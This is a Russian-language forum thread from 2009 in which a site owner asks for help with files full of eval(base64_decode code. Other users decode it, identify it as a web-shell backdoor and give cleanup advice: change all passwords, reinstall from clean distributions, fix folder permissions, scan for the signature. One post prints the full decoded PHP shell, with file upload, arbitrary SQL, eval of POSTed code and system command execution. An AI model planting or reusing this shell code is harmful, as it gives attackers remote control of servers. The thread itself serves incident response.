[3.7.3] ?eval(base64_decode

08-31-2009, 01:18 PM

Ребята, помогите, кто силен в кодировке!
У меня на сайте. щас сканирую фтп и уже нашел с десяток файлов с этим кодом:

Click image for larger version

Name: 01.jpg
Views: 35
Size: 63.3 KB
ID: 18373

Что за код и как с ним бороться! я в замешательстве! Помогите кто знает что и как?
Сам код в приложении

08-31-2009, 01:26 PM

sava36, какой-то троян. скорее всего c99shell. ищ такие строки везде в скриптах и сноси их нафиг. временно прикрывай доступ на форум и ищи дыры.

Ghost добавил 31.08.2009 в 13:28
з.ы. если конечно это разработчики скриптов не закодировали таким образом свое изделие, что вряд ли.

08-31-2009, 01:35 PM

Quote:

Originally Posted by Ghost

sava36, какой-то троян. скорее всего c99shell. ищ такие строки везде в скриптах и сноси их нафиг. временно прикрывай доступ на форум и ищи дыры.

каждый файл. чисто этот скрипе и все. Выбросить могу. к как искать дыры....?

08-31-2009, 01:38 PM

раз пять или шесть был закодирован в base_64 =)
вытащил оригинальный код пхп:

PHP Code:


			
if ($_POST["action"] == "upload") {



    $l=$_FILES["filepath"]["tmp_name"];

    $newpath=$_POST["newpath"];

    if ($newpath!="") move_uploaded_file($l,$newpath);

    echo "done";



} else if ($_POST["action"] == "sql") {



    $query = $_POST["query"];

    $query = str_replace("\'","'",$query);

    $lnk = mysql_connect($_POST["server"], $_POST["user"], $_POST["pass"]) or die ('Not connected : ' . mysql_error());

    mysql_select_db($_POST["db"], $lnk) or die ('Db failed: ' . mysql_error());

    mysql_query($query, $lnk) or die ('Invalid query: ' . mysql_error());

    mysql_close($lnk);

    echo "done<br><pre>$query</pre>";



} else if ($_POST["action"] == "runphp") {



    eval(base64_decode($_POST["cmd"]));



} else {



    $disablefunc = @ini_get("disable_functions");

    if (!empty($disablefunc)) {

        $disablefunc = str_replace(" ","",$disablefunc);

        $disablefunc = explode(",",$disablefunc);

    } else $disablefunc = array();



    function myshellexec($cmd) {

        global $disablefunc;

        $result = "";

        if (!empty($cmd)) {

            if (is_callable("exec") and !@in_array("exec",$disablefunc)) {@exec($cmd,$result); $result = @join("\n",$result);}

            elseif (($result = `$cmd`) !== FALSE) {}

            elseif (is_callable("system") and !@in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); @system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}

            elseif (is_callable("passthru") and !@in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); @passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}

            elseif (is_resource($fp = @popen($cmd,"r"))) {

                $result = "";

                while(!feof($fp)) {$result .= @fread($fp,1024);}

                @pclose($fp);

            }

        }

        return $result;

    }

    $cmd = $_POST["cmd"];

    echo "<form method=post>";

    echo "<input type=text name=cmd value='$cmd' size=150>";

    echo "<input type=submit name=B_SUBMIT value='Go'>";

    echo "</form>";

    if ($cmd != "") {

        echo "<pre>";

        $cmd=stripslashes($cmd);

        echo "Executing $cmd \n";

        echo myshellexec("$cmd");

        echo "</pre>";

        exit;

    }

}

создает форму загрузки файла на сервер

08-31-2009, 01:40 PM

хм. шелл.

отключайте доступ к сайту, ищите дыры.

Ghost добавил 31.08.2009 в 13:43

Quote:

Originally Posted by sava36

как искать дыры

долго и муторно. просто удали все скрипты и залей заново с чистых дистрибов (не заменяй, а именно сперва очисть папки, пересоздав их с нужными правами доступа). заново расставь chmod'ы к папкам.

Ghost добавил 31.08.2009 в 13:45

Quote:

Originally Posted by kerk

создает форму загрузки файла на сервер

ну там еще есть выполнение sql-запросов, php-кода и системных команд. простенький набор, в отличие от того же c99, но все нужные для backdoor'а функции присутствуют.

08-31-2009, 01:47 PM

да, я видел =)
причем, это самый маленький по размеру скрипт, который мне встречался =)

08-31-2009, 02:07 PM

Quote:

Originally Posted by Ghost

долго и муторно. просто удали все скрипты и залей заново с чистых дистрибов (не заменяй, а именно сперва очисть папки, пересоздав их с нужными правами доступа). заново расставь chmod'ы к папкам.

Эти файлы все были залиты - 25.09.2008 г. во всех вайлах только этот код. так какие скрипты удалять и новые заливать? у меня на сайте каоло 3 гигов

08-31-2009, 02:19 PM

sava36, раз тебе залили файлы, значит

либо через фтп -- меняй все пароли на фтп. ну в довесок еще смени пароль на бд, админский пароль к админке и проч. -- короче, все пароли
либо были дыры в безопасности, связанные с заливкой файлов и хранением файлов (chmod 777 на папку без отключенной обработки php/perl) -- нужно выставлять нужные права на папки, чтобы в те ппки, где хранятся скрипты, никто ничего залить не мог, а те куда заливать можно -- не позволяли исполнять php/perl.

т.к. шелл был залит давно, то с его помощью могли быть внесены изменения в уже существующие файлы, из-за чего даже удаление самого кода шелла ни к чему не приведет, т.к. он будет заново залит -- поэтому нужно перезалить все файлы php-скриптов с чистых дистрибутивов.

возможен вариант -- шелл спрятали редиски в сам дистриб воблы или продуктов. или там есть уязвимость для заливки. тогда нужно обновить версию воблы до последней и проверить все дополнительные продукты на орге -- если в продуктах находится уязвимость, то их там отправляют на кладбище до тех пор, пока автор ее не пофиксит. если все в порядке -- остается только самому ручками проверить коды всех продуктов, хотя бы на предмет наличия подобных кодов с "eval(base64_decode".

Ghost добавил 31.08.2009 в 14:21

Quote:

Originally Posted by sava36

у меня на сайте каоло 3 гигов

ну не скриптов же? всех скриптов у тебя там будет не больше 10 мегабайт. остальное -- данные, т.е. залитые пользователями файлы.

08-31-2009, 03:15 PM

Ghost, у меня это не на вобле, а в Joomla (форум вроде не заражен!!!!)! Все файлы я убил. а как проверить другие РНР файлы на изменение....???? Я в этих делах, к сожалению, - БОЛЬШОЙ чайник!!!

Так и сделал. удалил 23 файла.

08-31-2009, 03:27 PM

Quote:

Originally Posted by sava36

у меня это не на вобле, а в Joomla!

зашибись. а чё тогда эта тема делает на этом форуме? ну ладно, здесь есть раздел, посвященный Joomla, но почему тогда эта тема хотя бы не в нем?

Quote:

Originally Posted by sava36

как проверить другие РНР файлы на изменение

точно так же как и любой другой файл -- посмотреть время создания/модификации и размер -- сравнить их с соответствующими значениями оригинальных файлов из дистрибутива, включить текстовый поиск по файлу на предмет наличия в нем указанного тобой кода. в конце концов, всегда можно тупо скопировать все скрипты на свою машину, обновить антивиревые базы и прогнать сканирование папочки -- всякие "Backdoor.PHP.*" должны выявиться на ура.